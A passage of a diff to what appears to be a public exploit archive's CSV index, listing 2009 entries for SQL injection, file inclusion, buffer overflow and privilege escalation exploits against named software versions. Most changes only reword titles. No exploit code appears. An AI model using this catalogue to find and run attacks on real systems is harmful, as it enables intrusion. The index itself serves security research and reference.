File) Local Stack Overflow Exploit (SEH)",2009-03-18,His0k4,windows,local,0 -8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 Multiple Remote Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 +8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 Remote Arbitrary File Deletion Vulnerability",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection Vulnerability",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 Remote Denial of Service Vulnerability",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 -8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass/SQL) Multiple Remote Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 +8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/sql) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 @@ -7761,7 +7761,7 @@ id,file,description,date,author,platform,type,port 8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit",2009-03-20,His0k4,windows,local,0 -8252,platforms/php/webapps/8252.txt,"Pixie CMS (XSS/SQL) Multiple Remote Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 +8252,platforms/php/webapps/8252.txt,"pixie cms (xss/sql) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 Remote Stack Buffer Overflow Exploit",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit",2009-03-23,Invisibility,php,webapps,0 8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability",2009-03-23,p3s0k!,php,webapps,0 @@ -7777,7 +7777,7 @@ id,file,description,date,author,platform,type,port 8265,platforms/osx/dos/8265.c,"Mac OS X xnu <= 1228.x - (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit",2009-03-23,His0k4,windows,local,0 -8268,platforms/php/webapps/8268.php,"PHPizabi v0.848b C1 HFP1-3 Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 +8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 @@ -7788,18 +7788,18 @@ id,file,description,date,author,platform,type,port 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0 -8279,platforms/php/webapps/8279.txt,"PHPizabi v0.848b C1 HFP1 Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 +8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection Vulnerability",2009-03-24,x0r,php,webapps,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day",2009-03-25,"Guido Landi",multiple,dos,0 -8287,platforms/php/webapps/8287.php,"PHPizabi v0.848b C1 HFP1-3 Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 +8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 Remote Command Execution Exploit",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 Multiple Local File Inclusion Vulnerabilities",2009-03-26,ahmadbady,php,webapps,0 -8291,platforms/php/webapps/8291.txt,"Acute Control Panel 1.0.0 (SQL/RFI) Multiple Remote Vulnerabilities",2009-03-26,SirGod,php,webapps,0 +8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 (sql/rfi) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 (category_id) SQL Injection Vulnerability",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln",2009-03-27,Qabandi,php,webapps,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server <= 5.7.0 (NLST) DoS Exploit",2009-03-27,"Jonathan Salwan",windows,dos,0 @@ -7823,11 +7823,11 @@ id,file,description,date,author,platform,type,port 8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (playlist) Universal SEH Overwrite Exploit",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC",2009-03-30,"Alfons Luja",windows,dos,0 -8315,platforms/php/webapps/8315.txt,"Gravy Media CMS 1.07 Multiple Remote Vulnerabilities",2009-03-30,x0r,php,webapps,0 +8315,platforms/php/webapps/8315.txt,"gravy media cms 1.07 Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 Multiple Auth Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 Remote Command Execution Exploit",2009-03-30,Osirys,php,webapps,0 8318,platforms/php/webapps/8318.txt,"JobHut <= 1.2 (pk) Remote SQL Injection Vulnerability",2009-03-30,K-159,php,webapps,0 -8319,platforms/php/webapps/8319.txt,"Family Connection 1.8.1 Multiple Remote Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 +8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 8320,platforms/multiple/dos/8320.py,"Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 @@ -7835,7 +7835,7 @@ id,file,description,date,author,platform,type,port 8324,platforms/php/webapps/8324.php,"Podcast Generator <= 1.1 Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart <= 1.1.2 Remote SQL Injection Exploit (meta)",2009-03-31,waraxe,php,webapps,0 -8327,platforms/php/webapps/8327.txt,"VirtueMart <= 1.1.2 Multiple Remote Vulnerabilities",2009-03-31,waraxe,php,webapps,0 +8327,platforms/php/webapps/8327.txt,"virtuemart <= 1.1.2 Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 8328,platforms/php/webapps/8328.txt,"webEdition <= 6.0.0.4 (WE_LANGUAGE) Local File Inclusion Vulnerability",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 Remote Password Change/Delete/Activate User Vulnerability",2009-03-31,"ThE g0bL!N",php,webapps,0 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability",2009-03-31,DarKdewiL,php,webapps,0 @@ -7869,10 +7869,10 @@ id,file,description,date,author,platform,type,port 8358,platforms/windows/dos/8358.pl,"UltraISO <= 9.3.3.2685 .ui Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC",2009-04-06,LiquidWorm,windows,dos,0 -8361,platforms/php/webapps/8361.txt,"Family Connections CMS <= 1.8.2 Blind SQL Injection Vulnerability",2009-04-07,"Salvatore Fresta",php,webapps,0 +8361,platforms/php/webapps/8361.txt,"Family Connections CMS <= 1.8.2 - Blind SQL Injection Vulnerability",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS <= 0.5.2 Remote Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 8363,platforms/windows/remote/8363.py,"XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)",2009-04-07,His0k4,windows,remote,80 -8364,platforms/php/webapps/8364.txt,"SASPCMS 0.9 Multiple Remote Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 +8364,platforms/php/webapps/8364.txt,"saspcms 0.9 Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 8365,platforms/php/webapps/8365.txt,"Joomla Component Maian Music 1.2.1 (category) SQL Injection Vuln",2009-04-08,H!tm@N,php,webapps,0 8366,platforms/php/webapps/8366.txt,"Joomla Component MailTo (article) SQL Injection Vulnerability",2009-04-08,H!tm@N,php,webapps,0 8367,platforms/php/webapps/8367.txt,"Joomla Component Cmimarketplace (viewit) Directory Traversal Vuln",2009-04-08,H!tm@N,php,webapps,0 @@ -7880,7 +7880,7 @@ id,file,description,date,author,platform,type,port 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit",2009-04-08,gat3way,linux,local,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC",2009-04-08,"Bui Quang Minh",windows,dos,0 8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 (.m3u/.ofl file) Universal BOF Exploit",2009-04-08,AlpHaNiX,windows,local,0 -8372,platforms/php/webapps/8372.txt,"Photo Graffix 3.4 Multiple Remote Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 +8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS (wrap_script) Remote SQL Injection Vulnerability",2009-04-08,Platen,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 (DB.MDB) Database Disclosure Vulnerability",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog <= 1.5.2 SEC_authenticate() SQL Injection Exploit",2009-04-09,Nine:Situations:Group,php,webapps,0 @@ -7889,20 +7889,20 @@ id,file,description,date,author,platform,type,port 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 (main.asp id) SQL Injection Vulnerability",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,Osirys,php,webapps,0 -8383,platforms/php/webapps/8383.txt,"AdaptBB 1.0b Multiple Remote Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 +8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8384,platforms/linux/remote/8384.txt,"net2ftp <= 0.97 Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 -8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 (Auth Bypass) SQL Injection Vuln",2009-04-09,"ThE g0bL!N",php,webapps,0 -8387,platforms/php/webapps/8387.txt,"Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 +8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Auth Bypass) SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",php,webapps,0 +8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 beta Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda <= 2.2.5 Remote File Overwriting Vulnerabilities",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 (refer_id) Blind SQL Injection Vulnerability",2009-04-10,"Salvatore Fresta",php,webapps,0 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability",2009-04-10,DSecRG,windows,remote,0 8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 -8394,platforms/php/webapps/8394.txt,"moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilities",2009-04-10,SirGod,php,webapps,0 +8394,platforms/php/webapps/8394.txt,"mozilocms 1.11 (lfi/pd/xss) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0 8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 (language) Local File Inclusion Vulnerability",2009-04-10,SirGod,php,webapps,0 -8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 Blind SQL Injection Exploit",2009-04-10,DNX,php,webapps,0 +8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection Exploit",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 Remote Shell Upload Vulnerability",2009-04-10,ZoRLu,asp,webapps,0 8398,platforms/windows/remote/8398.php,"ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8399,platforms/php/webapps/8399.pl,"Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit",2009-04-13,StAkeR,php,webapps,0 @@ -7929,8 +7929,8 @@ id,file,description,date,author,platform,type,port 8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]",2009-04-13,His0k4,windows,remote,8000 8423,platforms/php/webapps/8423.txt,"Jamroom (index.php t) Local File Inclusion Vulnerability",2009-04-14,zxvf,php,webapps,0 -8424,platforms/php/webapps/8424.txt,"AbleSpace 1.0 (XSS/BSQL) Multiple Remote Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 -8425,platforms/php/webapps/8425.txt,"PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 +8424,platforms/php/webapps/8424.txt,"ablespace 1.0 (xss/bsql) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 +8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/xss) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)",2009-04-14,e.wiZz!,windows,remote,0 @@ -7953,7 +7953,7 @@ id,file,description,date,author,platform,type,port 8445,platforms/windows/dos/8445.pl,"MS Windows Media Player (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 -8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 +8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz (M3u File) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 @@ -7985,10 +7985,10 @@ id,file,description,date,author,platform,type,port 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit",2009-04-20,Kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,SkyLined,windows,dos,0 -8480,platforms/php/webapps/8480.txt,"Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 +8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin (c) Remote SQL Injection Vulnerability",2009-04-20,OoN_Boy,php,webapps,0 -8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 (Upload/ID) Multiple Remote Vulnerabilities",2009-04-20,girex,php,webapps,0 +8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 (upload/id) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 8484,platforms/windows/dos/8484.pl,"1by1 1.67 (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -7998,7 +7998,7 @@ id,file,description,date,author,platform,type,port 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling Vulnerability",2009-04-20,"ThE g0bL!N",php,webapps,0 -8493,platforms/php/webapps/8493.txt,"FunGamez rc1 (AB/LFI) Multiple Remote Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 +8493,platforms/php/webapps/8493.txt,"fungamez rc1 (ab/lfi) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability",2009-04-20,DarKdewiL,php,webapps,0 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port 8499,platforms/php/webapps/8499.php,"Dokeos LMS <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 Remote Denial Of Service Exploit",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 -8502,platforms/php/webapps/8502.txt,"PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities",2009-04-21,SirGod,php,webapps,0 +8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 (lfi/sql) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability",2009-04-21,Kacper,php,webapps,0 8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 @@ -8015,7 +8015,7 @@ id,file,description,date,author,platform,type,port 8507,platforms/windows/dos/8507.py,"Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)",2009-04-21,"Dennis Yurichev",windows,dos,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability",2009-04-21,"ThE g0bL!N",php,webapps,0 -8510,platforms/php/webapps/8510.txt,"MixedCMS 1.0b (LFI/SU/AB/FD) Multiple Remote Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 +8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b (lfi/su/ab/fd) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 8513,platforms/php/webapps/8513.pl,"Dokeos LMS <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 @@ -8026,7 +8026,7 @@ id,file,description,date,author,platform,type,port 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2",2009-04-22,His0k4,windows,local,0 -8521,platforms/php/webapps/8521.txt,"FOWLCMS 1.1 (AB/LFI/SU) Multiple Remote Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 +8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 @@ -8037,12 +8037,12 @@ id,file,description,date,author,platform,type,port 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln",2009-04-24,ZoRLu,asp,webapps,0 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - (.ASX File) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0 -8532,platforms/php/webapps/8532.txt,"Photo-Rigma.BiZ 30 - (SQL/XSS) Multiple Remote Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 +8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (sql/xss) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities",2009-04-24,"Salvatore Fresta",php,webapps,0 8534,platforms/linux/local/8534.c,"libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 -8537,platforms/windows/remote/8537.txt,"dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 +8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns",2009-04-27,brain[pillow],php,webapps,0 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 (route) 